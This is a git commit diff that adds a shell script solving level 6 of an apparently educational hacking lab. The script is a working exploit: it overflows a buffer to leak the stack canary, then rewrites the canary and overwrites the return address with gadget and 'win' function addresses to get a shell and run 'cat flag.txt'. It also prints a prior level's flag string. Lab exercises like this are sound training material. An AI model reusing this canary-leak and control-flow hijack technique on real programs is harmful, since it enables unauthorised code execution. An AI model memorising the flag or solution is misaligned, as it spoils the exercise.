solved 6

2026-01-06 15:54:17 +01:00
parent c823836626
commit 4c3e281ef5
4 changed files with 62 additions and 0 deletions
--- a/4/level6/test.sh
+++ b/4/level6/test.sh
@@ -0,0 +1,34 @@
+#objdump
+#00000000004011d6 g     F .text	000000000000003a              win
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\xd6\x11\x40\00\00\00\00\00"
+#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
+STACKPT="\x02\00\00\00\00\00\00\00"
+
+read
+read
+printf "$OLDFLAG"
+read
+read
+
+printf "$PADDING""AAAAAAAA\n"
+read
+read
+read canary
+>&2 echo "read canary: "$(echo "$canary" | hd)
+read input
+>&2 echo $input
+
+>&2 echo "writing canary + exploit"
+printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n"
+read input
+>&2 echo "should be bye: "$input
+printf "cat flag.txt\n"
+read input
+>&2 echo "should be shell: "$input